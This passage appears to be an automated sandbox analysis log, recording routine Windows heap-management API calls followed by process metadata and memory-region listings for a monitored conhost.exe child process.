[0195.482] GetProcessHeap () returned 0x4770000
[0195.482] GetProcessHeap () returned 0x4770000
[0195.482] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779db8) returned 1
[0195.482] GetProcessHeap () returned 0x4770000
[0195.482] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779db8) returned 0x1fc
[0195.483] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779db8) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x477ae20) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x477ae20) returned 0x6a
[0195.483] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x477ae20) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779628) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779628) returned 0x16
[0195.483] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779628) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x477ab20) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x477ab20) returned 0x10
[0195.483] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x477ab20) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779488) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779488) returned 0x14
[0195.483] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779488) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47769e0) returned 1
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47769e0) returned 0xa0
[0195.484] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47769e0) returned 1
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777480) returned 1
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777480) returned 0x10
[0195.484] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777480) returned 1
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47793a8) returned 1
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47793a8) returned 0x14
[0195.484] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47793a8) returned 1
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x477ada8) returned 1
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x477ada8) returned 0x6e
[0195.484] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x477ada8) returned 1
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x477aaa8) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x477aaa8) returned 0x10
[0195.485] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x477aaa8) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779688) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779688) returned 0x14
[0195.485] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779688) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777408) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777408) returned 0xc
[0195.485] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777408) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47774b0) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47774b0) returned 0x10
[0195.485] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47774b0) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779608) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779608) returned 0x14
[0195.485] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779608) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4778ce0) returned 1
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4778ce0) returned 0x208
[0195.486] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4778ce0) returned 1
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777438) returned 1
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777438) returned 0x10
[0195.486] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777438) returned 1
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779588) returned 1
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779588) returned 0x14
[0195.486] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779588) returned 1
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x477a798) returned 1
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x477a798) returned 0x200
[0195.486] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x477a798) returned 1
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777468) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777468) returned 0x10
[0195.487] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777468) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779468) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779468) returned 0x14
[0195.487] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779468) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47795e8) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47795e8) returned 0x14
[0195.487] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47795e8) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47773a8) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47773a8) returned 0x10
[0195.487] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47773a8) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4772780) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4772780) returned 0x14
[0195.487] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4772780) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] GetProcessHeap () returned 0x4770000
[0195.488] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779448) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779448) returned 0x16
[0195.488] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779448) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777348) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777348) returned 0x10
[0195.488] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777348) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776618) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776618) returned 0x14
[0195.488] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776618) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4770598) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4770598) returned 0x2
[0195.488] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4770598) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776e48) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776e48) returned 0x14
[0195.488] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776e48) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776c10) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776c10) returned 0x14
[0195.489] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776c10) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776c30) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776c30) returned 0x14
[0195.489] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776c30) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776c50) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776c50) returned 0x14
[0195.489] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776c50) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779548) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779548) returned 0x14
[0195.489] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779548) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779528) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779528) returned 0x14
[0195.490] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779528) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776a88) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776a88) returned 0x30
[0195.490] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776a88) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47795a8) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47795a8) returned 0x14
[0195.490] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47795a8) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47770d0) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47770d0) returned 0x30
[0195.490] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47770d0) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47794a8) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47794a8) returned 0x14
[0195.490] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47794a8) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47892c0) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47892c0) returned 0x82
[0195.491] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47892c0) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4781e50) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4781e50) returned 0x14
[0195.491] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4781e50) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47774e0) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47774e0) returned 0x10
[0195.491] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47774e0) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776840) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776840) returned 0x14
[0195.491] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776840) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776860) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776860) returned 0x14
[0195.491] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776860) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776880) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776880) returned 0x14
[0195.492] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776880) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47765d8) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47765d8) returned 0x14
[0195.492] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47765d8) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47773d8) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47773d8) returned 0x10
[0195.492] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47773d8) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47765f8) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47765f8) returned 0x14
[0195.492] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47765f8) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47727a0) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47727a0) returned 0x14
[0195.492] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47727a0) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47793c8) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47793c8) returned 0x14
[0195.493] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47793c8) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779428) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779428) returned 0x14
[0195.493] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779428) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47794e8) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47794e8) returned 0x14
[0195.493] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47794e8) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47793e8) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47793e8) returned 0x14
[0195.493] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47793e8) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777390) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777390) returned 0x10
[0195.493] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777390) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] GetProcessHeap () returned 0x4770000
[0195.494] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47727c0) returned 1
[0195.494] GetProcessHeap () returned 0x4770000
[0195.494] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47727c0) returned 0x14
[0195.494] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47727c0) returned 1
[0195.494] GetProcessHeap () returned 0x4770000
[0195.494] GetProcessHeap () returned 0x4770000
[0195.494] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777378) returned 1
[0195.494] GetProcessHeap () returned 0x4770000
[0195.494] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777378) returned 0x10
[0195.494] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777378) returned 1
[0195.494] exit (_Code=0)
Thread:
id = 18
os_tid = 0x2f8
Process:
id = "3"
image_name = "conhost.exe"
filename = "c:\\windows\\system32\\conhost.exe"
page_root = "0x20994000"
os_pid = "0x4e4"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "2"
os_parent_pid = "0x12c8"
cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
cur_dir = "C:\\Windows"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 968
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 969
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 970
start_va = 0x50000
end_va = 0x8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 971
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 972
start_va = 0x400000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 973
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 974
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 975
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 976
start_va = 0x7ff747c50000
end_va = 0x7ff747c60fff
monitored = 0
entry_point = 0x7ff747c516b0
region_type = mapped_file
name = "conhost.exe"
filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")
Region:
id = 977
start_va = 0x7ffc5f810000
end_va = 0x7ffc5f9d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 978
start_va = 0x6d0000
end_va = 0x7cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006d0000"
filename = ""
Region:
id = 979
start_va = 0x7ffc5bfa0000
end_va = 0x7ffc5c187fff
monitored = 0
entry_point = 0x7ffc5bfcba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 980
start_va = 0x7ffc5ecd0000
end_va = 0x7ffc5ed7cfff
monitored = 0
entry_point = 0x7ffc5ece81a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 981
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 982
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 983
start_va = 0x90000
end_va = 0x14dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 984
start_va = 0x7ffc5e850000
end_va = 0x7ffc5e8ecfff
monitored = 0
